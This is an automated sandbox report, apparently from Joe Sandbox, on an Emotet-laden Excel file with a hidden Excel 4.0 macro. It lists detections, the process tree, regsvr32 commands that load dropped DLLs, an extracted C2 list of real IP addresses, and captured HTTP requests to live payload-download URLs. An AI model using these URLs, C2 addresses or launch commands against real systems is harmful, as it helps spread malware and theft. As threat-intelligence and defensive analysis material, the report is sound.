Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bericht 6581.xls

Overview

General Information

Sample Name:Bericht 6581.xls
Analysis ID:667161
MD5:349779ed9b68f3fc148e8d81a5fa1c2a
SHA1:b940cabd8846120f3c383edac2ee817f280552c5
SHA256:b8e39a80c58b7bfe21d4a9cc695128aa1b3066e3f85a2138fcacdc4fd96403a2
Tags:xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2716 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2480 cmdline: C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1600 cmdline: C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2164 cmdline: C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1672 cmdline: C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1316 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 2364 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["174.138.33.49:7080", "188.165.79.151:443", "196.44.98.190:8080", "5.253.30.17:7080", "190.145.8.4:443", "54.37.228.122:443", "128.199.217.206:443", "175.126.176.79:8080", "104.248.225.227:8080", "54.37.106.167:8080", "198.199.70.22:8080", "139.59.80.108:8080", "103.85.95.4:8080", "165.232.185.110:8080", "103.224.241.74:8080", "178.62.112.199:8080", "178.238.225.252:8080", "62.171.178.147:8080", "202.134.4.210:7080", "103.71.99.57:8080", "103.41.204.169:8080", "139.196.72.155:8080", "188.225.32.231:4143", "87.106.97.83:7080", "37.44.244.177:8080", "64.227.55.231:8080", "93.104.209.107:8080", "103.56.149.105:8080", "43.129.209.178:443", "202.29.239.162:443", "210.57.209.142:8080", "83.229.80.93:8080", "85.25.120.45:8080", "190.107.19.179:443", "157.230.99.206:8080", "195.77.239.39:8080", "36.67.23.59:443", "104.244.79.94:443", "118.98.72.86:443", "37.187.114.15:8080", "46.101.98.60:8080", "85.214.67.203:8080", "165.22.254.236:8080", "157.245.111.0:8080", "128.199.242.164:8080", "202.28.34.99:8080", "88.217.172.165:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0Z74QVUQAAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWXL4QVUQAAIg="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Bericht 6581.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x15aaa:$s1: Excel
  • 0x16b3e:$s1: Excel
  • 0x3520:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\Bericht 6581.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x15aaa:$s1: Excel
  • 0x16b3e:$s1: Excel
  • 0x3520:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.regsvr32.exe.1f40000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            8.2.regsvr32.exe.2020000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.regsvr32.exe.1f40000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                8.2.regsvr32.exe.2020000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.22174.138.33.494917770802404316 07/17/22-13:14:11.436544
                  SID:2404316
                  Source Port:49177
                  Destination Port:7080
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: Bericht 6581.xlsMetadefender: Detection: 34%Perma Link
                  Source: Bericht 6581.xlsReversingLabs: Detection: 46%
                  Antivirus detection for URL or domain
                  Source: https://atperson.com/campusvirtual/EOgFGo17w/Avira URL Cloud: Label: malware
                  Source: https://174.138.33.49:7080/$Avira URL Cloud: Label: malware
                  Source: https://js.cofounderspecials.com/splash.js?v=1.1.1Avira URL Cloud: Label: malware
                  Source: https://174.138.33.49:7080/(Avira URL Cloud: Label: malware
                  Source: http://atici.net/c/JDFDBMIz/Avira URL Cloud: Label: malware
                  Multi AV Scanner detection for domain / URL
                  Source: atperson.comVirustotal: Detection: 12%Perma Link
                  Source: atici.netVirustotal: Detection: 13%Perma Link
                  Source: eliteturismo.comVirustotal: Detection: 11%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dllMetadefender: Detection: 54%Perma Link
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dllReversingLabs: Detection: 88%
                  Source: C:\Users\user\soci4.ocxMetadefender: Detection: 54%Perma Link
                  Source: C:\Users\user\soci4.ocxReversingLabs: Detection: 88%
                  Source: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)Metadefender: Detection: 54%Perma Link
                  Source: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)ReversingLabs: Detection: 88%
                  Source: 00000008.00000002.1764271448.000000000016A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["174.138.33.49:7080", "188.165.79.151:443", "196.44.98.190:8080", "5.253.30.17:7080", "190.145.8.4:443", "54.37.228.122:443", "128.199.217.206:443", "175.126.176.79:8080", "104.248.225.227:8080", "54.37.106.167:8080", "198.199.70.22:8080", "139.59.80.108:8080", "103.85.95.4:8080", "165.232.185.110:8080", "103.224.241.74:8080", "178.62.112.199:8080", "178.238.225.252:8080", "62.171.178.147:8080", "202.134.4.210:7080", "103.71.99.57:8080", "103.41.204.169:8080", "139.196.72.155:8080", "188.225.32.231:4143", "87.106.97.83:7080", "37.44.244.177:8080", "64.227.55.231:8080", "93.104.209.107:8080", "103.56.149.105:8080", "43.129.209.178:443", "202.29.239.162:443", "210.57.209.142:8080", "83.229.80.93:8080", "85.25.120.45:8080", "190.107.19.179:443", "157.230.99.206:8080", "195.77.239.39:8080", "36.67.23.59:443", "104.244.79.94:443", "118.98.72.86:443", "37.187.114.15:8080", "46.101.98.60:8080", "85.214.67.203:8080", "165.22.254.236:8080", "157.245.111.0:8080", "128.199.242.164:8080", "202.28.34.99:8080", "88.217.172.165:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0Z74QVUQAAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWXL4QVUQAAIg="]}
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 51.38.169.114:443 -> 192.168.2.22:49171 version: TLS 1.2
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00000001800427CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00000001800427CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180042F88 FindFirstFileExW,7_2_0000000180042F88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_0000000180043464
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0214C9F0 FindFirstFileW,FindNextFileW,8_2_0214C9F0

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (drops PE files)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: I7IggNeBzEXeF5[1].dll.0.drJump to dropped file
                  Document exploit detected (creates forbidden files)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8WkzZvRZPr2gVDdMW[1].dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dllJump to behavior
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                  Document exploit detected (UrlDownloadToFile)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                  Source: global trafficDNS query: name: atperson.com
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 51.38.169.114:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 51.38.169.114:443

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 174.138.33.49 7080Jump to behavior
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.22:49177 -> 174.138.33.49:7080
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 174.138.33.49:7080
                  Source: Malware configuration extractorIPs: 188.165.79.151:443
                  Source: Malware configuration extractorIPs: 196.44.98.190:8080
                  Source: Malware configuration extractorIPs: 5.253.30.17:7080
                  Source: Malware configuration extractorIPs: 190.145.8.4:443
                  Source: Malware configuration extractorIPs: 54.37.228.122:443
                  Source: Malware configuration extractorIPs: 128.199.217.206:443
                  Source: Malware configuration extractorIPs: 175.126.176.79:8080
                  Source: Malware configuration extractorIPs: 104.248.225.227:8080
                  Source: Malware configuration extractorIPs: 54.37.106.167:8080
                  Source: Malware configuration extractorIPs: 198.199.70.22:8080
                  Source: Malware configuration extractorIPs: 139.59.80.108:8080
                  Source: Malware configuration extractorIPs: 103.85.95.4:8080
                  Source: Malware configuration extractorIPs: 165.232.185.110:8080
                  Source: Malware configuration extractorIPs: 103.224.241.74:8080
                  Source: Malware configuration extractorIPs: 178.62.112.199:8080
                  Source: Malware configuration extractorIPs: 178.238.225.252:8080
                  Source: Malware configuration extractorIPs: 62.171.178.147:8080
                  Source: Malware configuration extractorIPs: 202.134.4.210:7080
                  Source: Malware configuration extractorIPs: 103.71.99.57:8080
                  Source: Malware configuration extractorIPs: 103.41.204.169:8080
                  Source: Malware configuration extractorIPs: 139.196.72.155:8080
                  Source: Malware configuration extractorIPs: 188.225.32.231:4143
                  Source: Malware configuration extractorIPs: 87.106.97.83:7080
                  Source: Malware configuration extractorIPs: 37.44.244.177:8080
                  Source: Malware configuration extractorIPs: 64.227.55.231:8080
                  Source: Malware configuration extractorIPs: 93.104.209.107:8080
                  Source: Malware configuration extractorIPs: 103.56.149.105:8080
                  Source: Malware configuration extractorIPs: 43.129.209.178:443
                  Source: Malware configuration extractorIPs: 202.29.239.162:443
                  Source: Malware configuration extractorIPs: 210.57.209.142:8080
                  Source: Malware configuration extractorIPs: 83.229.80.93:8080
                  Source: Malware configuration extractorIPs: 85.25.120.45:8080
                  Source: Malware configuration extractorIPs: 190.107.19.179:443
                  Source: Malware configuration extractorIPs: 157.230.99.206:8080
                  Source: Malware configuration extractorIPs: 195.77.239.39:8080
                  Source: Malware configuration extractorIPs: 36.67.23.59:443
                  Source: Malware configuration extractorIPs: 104.244.79.94:443
                  Source: Malware configuration extractorIPs: 118.98.72.86:443
                  Source: Malware configuration extractorIPs: 37.187.114.15:8080
                  Source: Malware configuration extractorIPs: 46.101.98.60:8080
                  Source: Malware configuration extractorIPs: 85.214.67.203:8080
                  Source: Malware configuration extractorIPs: 165.22.254.236:8080
                  Source: Malware configuration extractorIPs: 157.245.111.0:8080
                  Source: Malware configuration extractorIPs: 128.199.242.164:8080
                  Source: Malware configuration extractorIPs: 202.28.34.99:8080
                  Source: Malware configuration extractorIPs: 88.217.172.165:8080
                  Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                  Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Joe Sandbox ViewIP Address: 157.230.99.206 157.230.99.206
                  Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 17 Jul 2022 11:13:34 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Sun, 17 Jul 2022 11:13:34 GMTContent-Disposition: attachment; filename="I7IggNeBzEXeF5.dll"Content-Transfer-Encoding: binarySet-Cookie: 62d3eede6f19e=1658056414; expires=Sun, 17-Jul-2022 11:14:34 GMT; Max-Age=60; path=/X-Content-Type-Options: nosniffUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 17 Jul 2022 11:13:34 GMTContent-Length: 850944Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 fc 1a 64 a4 9d 74 37 a4 9d 74 37 a4 9d 74 37 77 ef 77 36 a2 9d 74 37 77 ef 71 36 21 9d 74 37 77 ef 70 36 ae 9d 74 37 f6 e8 71 36 87 9d 74 37 f6 e8 70 36 aa 9d 74 37 f6 e8 77 36 ad 9d 74 37 77 ef 75 36 ad 9d 74 37 a4 9d 75 37 c7 9d 74 37 65 e8 71 36 a6 9d 74 37 65 e8 74 36 a5 9d 74 37 65 e8 8b 37 a5 9d 74 37 a4 9d e3 37 a6 9d 74 37 65 e8 76 36 a5 9d 74 37 52 69 63 68 a4 9d 74 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 29 76 cc 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 b6 05 00 00 5c 07 00 00 00 00 00 54 2c 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0d 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 ee 06 00 14 04 00 00 c4 f2 06 00 64 00 00 00 00 90 07 00 20 b0 05 00 00 30 07 00 38 46 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 0c 08 00 00 c0 87 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 87 06 00 38 01 00 00 00 00 00 00 00 00 00 00 00 d0 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 b4 05 00 00 10 00 00 00 b6 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 2d 01 00 00 d0 05 00 00 2e 01 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 27 00 00 00 00 07 00 00 0e 00 00 00 e8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 38 46 00 00 00 30 07 00 00 48 00 00 00 f6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 80 07 00 00 02 00 00 00 3e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 20 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$dt7t7t7ww6
                  Source: global trafficHTTP traffic detected: GET /campusvirtual/EOgFGo17w/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atperson.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /c/JDFDBMIz/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atici.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /libraries/nbnH9dpd/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: domesticuif.co.zaConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 174.138.33.49:7080
                  Source: unknownNetwork traffic detected: IP country count 20
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Jul 2022 11:09:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://atperson.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: regsvr32.exe, 00000008.00000002.1764380077.0000000000205000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1561207698.0000000000205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                  Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49/
                  Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49:7080/$
                  Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49:7080/(
                  Source: 8WkzZvRZPr2gVDdMW[1].dll.0.dr, soci3.ocx.0.drString found in binary or memory: https://js.cofounderspecials.com/splash.js?v=1.1.1
                  Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8WkzZvRZPr2gVDdMW[1].dllJump to behavior
                  Source: unknownDNS traffic detected: queries for: atperson.com
                  Source: global trafficHTTP traffic detected: GET /campusvirtual/EOgFGo17w/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atperson.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /c/JDFDBMIz/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atici.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /libraries/nbnH9dpd/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: domesticuif.co.zaConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 51.38.169.114:443 -> 192.168.2.22:49171 version: TLS 1.2

                  E-Banking Fraud

